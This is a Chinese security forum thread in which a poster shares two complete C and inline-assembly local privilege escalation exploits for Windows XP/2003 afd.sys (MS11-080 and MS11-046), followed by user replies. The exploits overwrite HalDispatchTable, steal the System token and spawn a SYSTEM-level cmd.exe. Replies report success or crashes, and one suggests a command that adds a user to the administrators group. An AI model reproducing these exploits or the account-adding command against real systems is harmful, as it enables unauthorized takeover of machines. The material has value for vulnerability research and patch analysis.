
[系统底层] [讨论]MS11-080、MS11-046两个提权代码

2011-12-1 20:09 21543

拿着大牛写的代码自己弹CMD玩,多多包涵。。
/*
 * MS11-080 Afd.sys Privilege Escalation Exploit
 * 来源:Matteo Memelli,http://www.exploit-db.com/exploits/18176/
 * 改编:KiDebug,Google@pku.edu.cn
 * 编译:VC6.0
 * 测试环境:原版Windows XP SP3,Windows 2003 SP2,普通用户
 */
#include <stdio.h>
#include <Winsock2.h>
#include <windows.h>
#pragma comment (lib, "ws2_32.lib")

/*
 * One entry of the kernel's loaded-module list as returned by
 * NtQuerySystemInformation(SystemModuleInformation). The layout is dictated
 * by the kernel, not by this program: do not reorder or resize fields.
 * main() reads only ImageBase, FullPathName and OffsetToFileName of entry 0.
 */
typedef struct _RTL_PROCESS_MODULE_INFORMATION {
	HANDLE Section;                 // Not filled in
	PVOID MappedBase;
	PVOID ImageBase;                // kernel-space load address of the module
	ULONG ImageSize;
	ULONG Flags;
	USHORT LoadOrderIndex;
	USHORT InitOrderIndex;
	USHORT LoadCount;
	USHORT OffsetToFileName;        // index into FullPathName where the bare file name starts
	UCHAR  FullPathName[ 256 ];     // ANSI path, NUL-terminated by the kernel (assumed)
} RTL_PROCESS_MODULE_INFORMATION, *PRTL_PROCESS_MODULE_INFORMATION;

/*
 * Header of the SystemModuleInformation buffer. Declared with a single
 * trailing entry on purpose: main() passes sizeof(RTL_PROCESS_MODULES),
 * expects STATUS_INFO_LENGTH_MISMATCH, and only consumes Modules[0].
 */
typedef struct _RTL_PROCESS_MODULES {
	ULONG NumberOfModules;
	RTL_PROCESS_MODULE_INFORMATION Modules[ 1 ];	// variable-length in the real buffer; only the first entry is used here
} RTL_PROCESS_MODULES, *PRTL_PROCESS_MODULES;

/* __stdcall prototypes for the three undocumented ntdll exports; the pointers are resolved in main() via GetProcAddress. */
typedef ULONG ( __stdcall *NtQueryIntervalProfile_ ) ( ULONG, PULONG );
typedef ULONG ( __stdcall *NtQuerySystemInformation_ ) ( ULONG, PVOID, ULONG, PULONG );
typedef ULONG ( __stdcall *NtAllocateVirtualMemory_ ) ( HANDLE, PVOID, ULONG, PULONG, ULONG, ULONG );
NtQueryIntervalProfile_	NtQueryIntervalProfile;
NtAllocateVirtualMemory_ NtAllocateVirtualMemory;
NtQuerySystemInformation_ NtQuerySystemInformation;

/*
 * Kernel addresses computed in main(). They are file-scope globals because
 * ShellCode() references them by absolute address (mov esi,<global>), and the
 * copied payload resolves those references from this process's user-mode
 * address space when it runs. WriteToHalDispatchTable is the address the
 * AFD IOCTL is made to write to; the other three are ntoskrnl symbols.
 */
ULONG    PsInitialSystemProcess, PsReferencePrimaryToken, PsGetThreadProcess, WriteToHalDispatchTable;

/*
 * Kernel-mode payload reached through the overwritten HalDispatchTable slot
 * (see main). It is a naked function so no prologue/epilogue is emitted;
 * main() copies its first 100 bytes to 0x02080000. It copies a single dword
 * from the System process object into the current process object at the
 * same offset, recovering that offset at run time by scanning the bytes of
 * PsReferencePrimaryToken for the first 0x8D (lea) opcode and taking the
 * dword that follows it. Everything here assumes a 32-bit XP/2003 kernel
 * and the globals filled in by main(); it is not version-independent.
 * Inline asm is MSVC-only (VC6 per the header), so this cannot be restyled
 * without changing what is emitted.
 */
void _declspec(naked) ShellCode()
{
	__asm
	{
		pushad					; preserve every GPR and the flags for the interrupted kernel caller
		pushfd
		mov esi,PsReferencePrimaryToken		; kernel address of the function, filled in by main()
FindTokenOffset:
		lodsb					; scan forward one byte at a time ...
		cmp al, 8Dh;				; ... until the first 0x8D byte (lea opcode)
		jnz FindTokenOffset
		mov edi,[esi+1]				; edi = the dword after that opcode, used as the field offset below
		mov esi,PsInitialSystemProcess		; esi = &PsInitialSystemProcess
		mov esi,[esi]				; esi = System process object
		push fs:[124h]				; fs:[124h] - current KTHREAD on 32-bit Windows (KPCR.PrcbData.CurrentThread, assumed)
		mov eax,PsGetThreadProcess
		call eax				; eax = process object owning the current thread
		add esi, edi				; esi = System object + offset (source)
		add edi, eax				; edi = current object + offset (destination; edi reused)
		movsd					; copy one dword
		popfd
		popad
		ret
	}
}



/*
 * Entry point of the MS11-080 proof of concept (non-standard `void main`,
 * accepted by VC6). Flow: resolve the Nt* entry points, map the null page,
 * locate ntoskrnl in kernel space and compute the kernel addresses the
 * payload needs, stage a nop sled plus the payload, obtain an AFD socket
 * handle, issue the AFD IOCTL with a kernel address as its *output* buffer,
 * then call NtQueryIntervalProfile to reach the overwritten dispatch-table
 * slot and spawn cmd.exe. No resource is released on any path (socket,
 * Winsock state, the loaded ntoskrnl image, the mapped pages).
 * NOTE(review): several failures are only printed, not fatal, so the
 * trigger runs even when the kernel write did not happen; on a patched
 * system this presumably just yields a cmd.exe with the caller's own rights.
 */
void main( )
{
	// Resolve the undocumented ntdll exports; bail out if any is missing.
	HMODULE	ntdll				=	GetModuleHandle( "ntdll.dll" );
	NtQueryIntervalProfile		=	(NtQueryIntervalProfile_)GetProcAddress( ntdll ,"NtQueryIntervalProfile" );
	NtAllocateVirtualMemory		=	(NtAllocateVirtualMemory_)GetProcAddress( ntdll ,"NtAllocateVirtualMemory" );
	NtQuerySystemInformation	=	( NtQuerySystemInformation_ )GetProcAddress( ntdll ,"NtQuerySystemInformation" );
	if ( NtQueryIntervalProfile == NULL || NtAllocateVirtualMemory == NULL || NtQuerySystemInformation == NULL )
		return;

	// Map memory at the lowest addresses of this process ((HANDLE)-1 is the
	// current-process pseudo handle; base 1 rounds down to page 0). The
	// crafted request written at 0x1000 below must fall inside this region,
	// which presumably covers 0x0-0x1fff after the kernel's rounding — verify.
	ULONG    BaseAddress = 1 , RegionSize = 0x1000, status;
	status = NtAllocateVirtualMemory( (HANDLE)0xFFFFFFFF, (PVOID*)&BaseAddress, 0, &RegionSize, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE );
	if ( status )
		return;

	// Query the kernel module list with a deliberately one-entry buffer: the
	// call is expected to fail with STATUS_INFO_LENGTH_MISMATCH, and the code
	// relies on Modules[0] (the kernel image) still having been filled in —
	// true on the XP/2003 builds listed in the header, not guaranteed elsewhere.
	ULONG	NtoskrnlBase;
	RTL_PROCESS_MODULES	module;
	status = NtQuerySystemInformation( 11, &module, sizeof(RTL_PROCESS_MODULES), NULL);//SystemModuleInformation 11
	if ( status != 0xC0000004 )    //STATUS_INFO_LENGTH_MISMATCH
		return;

	NtoskrnlBase   	=	(ULONG)module.Modules[0].ImageBase;	// kernel-space load address of the kernel image

	// Load the same kernel image file into user space so its exports can be
	// located with GetProcAddress. FullPathName + OffsetToFileName is the bare
	// file name (ntoskrnl.exe / ntkrnlpa.exe / ...), found via the normal DLL
	// search path. The handle is never freed.
	HMODULE		ntoskrnl;
	ntoskrnl    =    LoadLibraryA( (LPCSTR)( module.Modules[0].FullPathName + module.Modules[0].OffsetToFileName ) );
	if ( ntoskrnl == NULL )
		return;

	// Rebase the user-space export addresses into kernel addresses:
	// kernel = user - user_base + kernel_base. HalDispatchTable+4 is the slot
	// NtQueryIntervalProfile ends up calling through; the additional +2 and
	// the 0x20000-byte sled below presumably compensate for the write not
	// landing exactly on a full dword — confirm against the original write-up.
	WriteToHalDispatchTable		=	(ULONG)GetProcAddress(ntoskrnl,"HalDispatchTable") - (ULONG)ntoskrnl + NtoskrnlBase + 4 + 2; // address to be overwritten
	PsInitialSystemProcess		=	(ULONG)GetProcAddress(ntoskrnl,"PsInitialSystemProcess") - (ULONG)ntoskrnl + NtoskrnlBase;
	PsReferencePrimaryToken		=	(ULONG)GetProcAddress(ntoskrnl,"PsReferencePrimaryToken") - (ULONG)ntoskrnl + NtoskrnlBase;
	PsGetThreadProcess			=	(ULONG)GetProcAddress(ntoskrnl,"PsGetThreadProcess") - (ULONG)ntoskrnl + NtoskrnlBase;
	
	// From here on the two exploits differ. Stage the payload: a 0x20000-byte
	// sled of 0x90 (nop) at 0x02070000 with the first 100 bytes of ShellCode
	// in its middle (0x02080000), so any landing point in the sled reaches it.
	if ( VirtualAlloc( (PVOID)0x02070000, 0x20000, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE ) == NULL )
		return;

	memset((PVOID)0x02070000,0x90,0x20000);
	memcpy((PVOID)0x02080000,ShellCode,100);	// 100 is an unchecked upper bound on the naked function's size


	WSADATA ws;

	SOCKET tcp_socket;
	struct sockaddr_in peer;
	ULONG  dwReturnSize;

	WSAStartup(0x0202,&ws);	// return value not checked

	// Any AFD-backed socket handle is enough for the IOCTL below. The connect
	// to 127.0.0.1:4455 is attempted, but its failure is only printed and
	// the handle is used regardless.
	peer.sin_family = AF_INET;
	peer.sin_port = htons(4455);
	peer.sin_addr.s_addr = inet_addr( "127.0.0.1" );

	tcp_socket = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);	// INVALID_SOCKET is not checked

	if ( connect(tcp_socket, (struct sockaddr*) &peer, sizeof(struct sockaddr_in)) )
	{
		printf("connect error\n");
	}

	// Crafted request in the low page: 0x108 bytes of 0x45 at 0x1000 with the
	// 25-byte header from buf1 at its start; the IOCTL's input buffer starts
	// 4 bytes in (0x1004), so the last 4 bytes it reads were not memset.
	UCHAR	buf1[26]= "\x41\x41\x41\x41\x42\x42\x42\x42\x00\x00\x00\x00\x44\x44\x44\x44\x01\x00\x00\x00\xe8\x00\x34\xf0\x00";
	memset((PVOID)0x1000,0x45,0x108);
	memcpy((PVOID)0x1000,buf1,25);
	
	// IOCTL 0x000120bb on the socket handle with a kernel address passed as
	// the output buffer: unpatched afd.sys writes through it (MS11-080).
	// Failure is only printed; the trigger below still runs.
	// NOTE(review): a DeviceIoControl on a socket handle whose output pointer
	// is a kernel address is the observable anomaly here.
	if(!DeviceIoControl((HANDLE)tcp_socket,0x000120bb, (PVOID)0x1004, 0x108, (PVOID)WriteToHalDispatchTable, 0x0,&dwReturnSize, NULL))
	{
		printf("error=%d\n", GetLastError());
	}

	// Trigger: NtQueryIntervalProfile(2) calls through the HalDispatchTable+4
	// slot, now pointing into the sled; then spawn cmd.exe, which inherits
	// this process's (by now replaced) token — a SYSTEM shell if it worked.
	// `status` is reused here only as a scratch output.
	NtQueryIntervalProfile( 2, &status );
	ShellExecute( NULL, "open", "cmd.exe", NULL, NULL, SW_SHOW);
	return;
}


/*
 * 触发MS11-046
 * 来源:azy,http://hi.baidu.com/azy0922/blog/item/053065d197cebfca572c8492.html
 * 改编:KiDebug,Google@pku.edu.cn
 * 编译:VC6.0
 * 测试环境:原版Windows XP SP3,Windows 2003 SP2,普通用户
 */
#include <stdio.h>
#include <Winsock2.h>
#include <windows.h>
#pragma comment (lib, "ws2_32.lib")

/*
 * One entry of the kernel's loaded-module list as returned by
 * NtQuerySystemInformation(SystemModuleInformation). The layout is dictated
 * by the kernel, not by this program: do not reorder or resize fields.
 * main() reads only ImageBase, FullPathName and OffsetToFileName of entry 0.
 */
typedef struct _RTL_PROCESS_MODULE_INFORMATION {
	HANDLE Section;                 // Not filled in
	PVOID MappedBase;
	PVOID ImageBase;                // kernel-space load address of the module
	ULONG ImageSize;
	ULONG Flags;
	USHORT LoadOrderIndex;
	USHORT InitOrderIndex;
	USHORT LoadCount;
	USHORT OffsetToFileName;        // index into FullPathName where the bare file name starts
	UCHAR  FullPathName[ 256 ];     // ANSI path, NUL-terminated by the kernel (assumed)
} RTL_PROCESS_MODULE_INFORMATION, *PRTL_PROCESS_MODULE_INFORMATION;

/*
 * Header of the SystemModuleInformation buffer. Declared with a single
 * trailing entry on purpose: main() passes sizeof(RTL_PROCESS_MODULES),
 * expects STATUS_INFO_LENGTH_MISMATCH, and only consumes Modules[0].
 */
typedef struct _RTL_PROCESS_MODULES {
	ULONG NumberOfModules;
	RTL_PROCESS_MODULE_INFORMATION Modules[ 1 ];	// variable-length in the real buffer; only the first entry is used here
} RTL_PROCESS_MODULES, *PRTL_PROCESS_MODULES;

/* __stdcall prototypes for the three undocumented ntdll exports; the pointers are resolved in main() via GetProcAddress. NtAllocateVirtualMemory is resolved but never called in this listing. */
typedef ULONG ( __stdcall *NtQueryIntervalProfile_ ) ( ULONG, PULONG );
typedef ULONG ( __stdcall *NtQuerySystemInformation_ ) ( ULONG, PVOID, ULONG, PULONG );
typedef ULONG ( __stdcall *NtAllocateVirtualMemory_ ) ( HANDLE, PVOID, ULONG, PULONG, ULONG, ULONG );
NtQueryIntervalProfile_	NtQueryIntervalProfile;
NtAllocateVirtualMemory_ NtAllocateVirtualMemory;
NtQuerySystemInformation_ NtQuerySystemInformation;

/*
 * Kernel addresses computed in main(). They are file-scope globals because
 * ShellCode() references them by absolute address (mov esi,<global>), and the
 * copied payload resolves those references from this process's user-mode
 * address space when it runs. WriteToHalDispatchTable is the address the
 * AFD IOCTL is made to write to; the other three are ntoskrnl symbols.
 */
ULONG    PsInitialSystemProcess, PsReferencePrimaryToken, PsGetThreadProcess, WriteToHalDispatchTable;

/*
 * Kernel-mode payload reached through the overwritten HalDispatchTable slot
 * (see main); identical to the one in the MS11-080 listing above. Naked, so
 * no prologue/epilogue is emitted; main() copies its first 100 bytes to
 * 0x02080000. It copies a single dword from the System process object into
 * the current process object at the same offset, recovering that offset at
 * run time by scanning PsReferencePrimaryToken for the first 0x8D (lea)
 * opcode and taking the dword that follows it. Assumes a 32-bit XP/2003
 * kernel and the globals filled in by main(). MSVC inline asm (VC6).
 */
void _declspec(naked) ShellCode()
{
	__asm
	{
		pushad					; preserve every GPR and the flags for the interrupted kernel caller
		pushfd
		mov esi,PsReferencePrimaryToken		; kernel address of the function, filled in by main()
FindTokenOffset:
		lodsb					; scan forward one byte at a time ...
		cmp al, 8Dh;				; ... until the first 0x8D byte (lea opcode)
		jnz FindTokenOffset
		mov edi,[esi+1]				; edi = the dword after that opcode, used as the field offset below
		mov esi,PsInitialSystemProcess		; esi = &PsInitialSystemProcess
		mov esi,[esi]				; esi = System process object
		push fs:[124h]				; fs:[124h] - current KTHREAD on 32-bit Windows (KPCR.PrcbData.CurrentThread, assumed)
		mov eax,PsGetThreadProcess
		call eax				; eax = process object owning the current thread
		add esi, edi				; esi = System object + offset (source)
		add edi, eax				; edi = current object + offset (destination; edi reused)
		movsd					; copy one dword
		popfd
		popad
		ret
	}
}



/*
 * Entry point of the MS11-046 proof of concept (non-standard `void main`,
 * accepted by VC6). Same skeleton as the MS11-080 listing: resolve the Nt*
 * entry points, locate ntoskrnl and compute the kernel addresses the payload
 * needs, stage a nop sled plus the payload, obtain an AFD socket handle,
 * issue an AFD IOCTL with a kernel address as its *output* buffer, then call
 * NtQueryIntervalProfile to reach the overwritten slot and spawn cmd.exe.
 * Differences from the first listing: no null-page mapping, the request is a
 * mostly-uninitialised stack buffer, IOCTL 0x12007, and the connect targets
 * port 0. Nothing is released on any path (socket, Winsock state, the loaded
 * ntoskrnl image, the sled pages).
 * NOTE(review): failures of connect and DeviceIoControl are only printed, so
 * the trigger runs whether or not the kernel write happened.
 */
void main( )
{
	// Resolve the undocumented ntdll exports; bail out if any is missing
	// (NtAllocateVirtualMemory is resolved but not used in this listing).
	HMODULE	ntdll				=	GetModuleHandle( "ntdll.dll" );
	NtQueryIntervalProfile		=	(NtQueryIntervalProfile_)GetProcAddress( ntdll ,"NtQueryIntervalProfile" );
	NtAllocateVirtualMemory		=	(NtAllocateVirtualMemory_)GetProcAddress( ntdll ,"NtAllocateVirtualMemory" );
	NtQuerySystemInformation	=	( NtQuerySystemInformation_ )GetProcAddress( ntdll ,"NtQuerySystemInformation" );
	if ( NtQueryIntervalProfile == NULL || NtAllocateVirtualMemory == NULL || NtQuerySystemInformation == NULL )
		return;
	
	// Query the kernel module list with a deliberately one-entry buffer: the
	// call is expected to fail with STATUS_INFO_LENGTH_MISMATCH, and the code
	// relies on Modules[0] (the kernel image) still having been filled in —
	// true on the XP/2003 builds listed in the header, not guaranteed elsewhere.
	ULONG	status, NtoskrnlBase;
	RTL_PROCESS_MODULES	module;
	status = NtQuerySystemInformation( 11, &module, sizeof(RTL_PROCESS_MODULES), NULL);//SystemModuleInformation 11
	if ( status != 0xC0000004 )    //STATUS_INFO_LENGTH_MISMATCH
		return;

	NtoskrnlBase   	=	(ULONG)module.Modules[0].ImageBase;	// kernel-space load address of the kernel image

	// Load the same kernel image file into user space so its exports can be
	// located with GetProcAddress. FullPathName + OffsetToFileName is the bare
	// file name (ntoskrnl.exe / ntkrnlpa.exe / ...), found via the normal DLL
	// search path. The handle is never freed.
	HMODULE		ntoskrnl;
	ntoskrnl    =    LoadLibraryA( (LPCSTR)( module.Modules[0].FullPathName + module.Modules[0].OffsetToFileName ) );
	if ( ntoskrnl == NULL )
		return;

	// Rebase the user-space export addresses into kernel addresses:
	// kernel = user - user_base + kernel_base. HalDispatchTable+4 is the slot
	// NtQueryIntervalProfile ends up calling through; the additional +2 and
	// the 0x20000-byte sled below presumably compensate for the write not
	// landing exactly on a full dword — confirm against the original write-up.
	WriteToHalDispatchTable		=	(ULONG)GetProcAddress(ntoskrnl,"HalDispatchTable") - (ULONG)ntoskrnl + NtoskrnlBase + 4 + 2; // address to be overwritten
	PsInitialSystemProcess		=	(ULONG)GetProcAddress(ntoskrnl,"PsInitialSystemProcess") - (ULONG)ntoskrnl + NtoskrnlBase;
	PsReferencePrimaryToken		=	(ULONG)GetProcAddress(ntoskrnl,"PsReferencePrimaryToken") - (ULONG)ntoskrnl + NtoskrnlBase;
	PsGetThreadProcess			=	(ULONG)GetProcAddress(ntoskrnl,"PsGetThreadProcess") - (ULONG)ntoskrnl + NtoskrnlBase;

	// From here on the two exploits differ. Stage the payload: a 0x20000-byte
	// sled of 0x90 (nop) at 0x02070000 with the first 100 bytes of ShellCode
	// in its middle (0x02080000), so any landing point in the sled reaches it.
	if ( VirtualAlloc( (PVOID)0x02070000, 0x20000, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE ) == NULL )
		return;
	
	memset((PVOID)0x02070000,0x90,0x20000);
	memcpy((PVOID)0x02080000,ShellCode,100);	// 100 is an unchecked upper bound on the naked function's size


	WSADATA ws;

	SOCKET tcp_socket;
	struct sockaddr_in peer;
	ULONG  dwReturnSize;

	WSAStartup(0x0202,&ws);	// return value not checked

	// Any AFD-backed socket handle is enough for the IOCTL below. The connect
	// targets port 0 and so is expected to fail; the failure is only printed
	// and the handle is used regardless.
	peer.sin_family = AF_INET;
	peer.sin_port = htons(0);
	peer.sin_addr.s_addr = inet_addr( "127.0.0.1" );

	tcp_socket = socket(AF_INET, SOCK_STREAM, 0);	// protocol 0 = default for SOCK_STREAM; INVALID_SOCKET is not checked

	if ( connect(tcp_socket, (struct sockaddr*) &peer, sizeof(struct sockaddr_in)) )
	{
		printf("connect error\n");
	}


	// Request buffer: only dwords 3 and 4 are set, the other 22 of the 0x60
	// bytes passed below are uninitialised stack contents.
	DWORD buf[0x30];
	buf[3]=1;
	buf[4]=0x20;

	// IOCTL 0x12007 on the socket handle with a kernel address passed as the
	// output buffer: unpatched afd.sys writes through it (MS11-046).
	// Failure is only printed; the trigger below still runs.
	// NOTE(review): a DeviceIoControl on a socket handle whose output pointer
	// is a kernel address is the observable anomaly here.
	if(!DeviceIoControl((HANDLE)tcp_socket,0x12007, (PVOID)buf, 0x60, (PVOID)WriteToHalDispatchTable, 0x0,&dwReturnSize, NULL))
	{
		printf("error=%d\n", GetLastError());
	}

	// Trigger: NtQueryIntervalProfile(2) calls through the HalDispatchTable+4
	// slot, now pointing into the sled; then spawn cmd.exe, which inherits
	// this process's (by now replaced) token — a SYSTEM shell if it worked.
	// `status` is reused here only as a scratch output.
	NtQueryIntervalProfile( 2, &status );
	ShellExecute( NULL, "open", "cmd.exe", NULL, NULL, SW_SHOW);
	return;
}



最新回复 (18)
coldairx 2011-12-1 20:27
2
0
加多点注释该多好啊!
狂起来 2011-12-1 21:04
3
0
这两个啥漏洞
zuoyefeng 2011-12-1 21:23
4
0
顶KiDebug
PEBOSS 2011-12-2 03:48
5
0
都是提权啊

什么时候来个溢出的
qhkest 2011-12-2 08:30
6
0
ms11-080在webshell下无法使用。
instruder 4 2011-12-2 08:54
7
0
kidebug 肿么能这么**
lhwqqq 2011-12-2 09:31
8
0
哎  看来我和高手还差得很多很多啊
peaceclub 6 2011-12-3 21:33
9
0
/*
 * Forum reply fragment, not a compilable unit: the assignments below are
 * outside any function and `tcp_socket` is not declared here. It sketches a
 * 32-bit and a 64-bit layout for the request header the MS11-080 listing
 * builds in buf1 (the values 0x41414141, 0x42424242, 1, 0xe8 and 0x4444
 * resemble buf1's bytes but the field order is not byte-for-byte the same —
 * compare before relying on it). The poster concludes x64 does not seem
 * usable this way.
 */
typedef struct _evil32
{
ULONG u1;
ULONG un0;
ULONG u2;
ULONG un1;
WORD  w1;
WORD  w2;
BYTE  z1;
}evil32;

/* 64-bit variant: the first 32-bit field is split in two (u1a/u1b) and u1b carries the socket handle. */
typedef struct _evil64
{
        ULONG u1a;
        ULONG u1b;
        ULONG un0;
        ULONG un1;
        WORD  w1;
        WORD  w2;
        BYTE  z1;
}evil64;

   evil32 e32;
  evil64 e64;
  e32.u1=0x41414141;
  e32.u2=0x42424242;
  e32.un0=0;
  e32.un1=1;
  e32.w1=0xe8;
  e32.w2=0x4444;
  e32.z1=0;

  e64.u1a=0x41414141;
  e64.u1b=tcp_socket;	// SOCKET is pointer-sized (64-bit on x64) but u1b is a ULONG — truncating store, presumably intentional
  e64.un0=0;
  e64.un1=1;
  e64.w1=0xe8;
  e64.w2=0x4444;
  e64.z1=0;

x64貌似不好利用。
longbbyl 2011-12-5 17:09
10
0
提权需要执行
tyTYtyTYTY 2011-12-5 20:37
11
0
支持!!!!!!!!!!!!!!!!!!!!
haw 2011-12-8 09:38
12
0
怎样用啊,我在VC6里编译运行弹出DOS窗口提示error=998,什么情况啊?
雅蠛蝶 2011-12-9 17:55
13
0
ShellExecute( NULL, "open", "cmd.exe", "/c net user xxxx /add && net localgroup administrators xxxx /add", NULL, SW_SHOW);
这样改一下也好~
xss 4 2011-12-11 11:42
14
0
尝试了下,第一个编译成功弹出cmd黑框,任务管理器里面显示system用户权限进程
拍拖 1 2011-12-14 15:17
15
0
第一个在我计算机上崩溃蓝屏 XP SP3
wlksl 2011-12-14 16:55
16
0
两个都成功了!!
sillyer 2012-5-23 14:36
17
0
有支持64位的么?
choday 2 2012-5-25 13:08
18
0
sp3 直接蓝屏
dswang 2012-8-30 11:13
19
0
很厉害,能够有分析说明就好了~~~菜鸟飘过